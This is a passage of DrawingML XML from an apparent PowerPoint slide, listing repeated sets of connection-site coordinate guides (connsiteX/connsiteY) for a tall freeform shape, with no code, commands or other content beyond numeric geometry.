              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY88" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245337 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY88" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2843952 h 6858000"/>
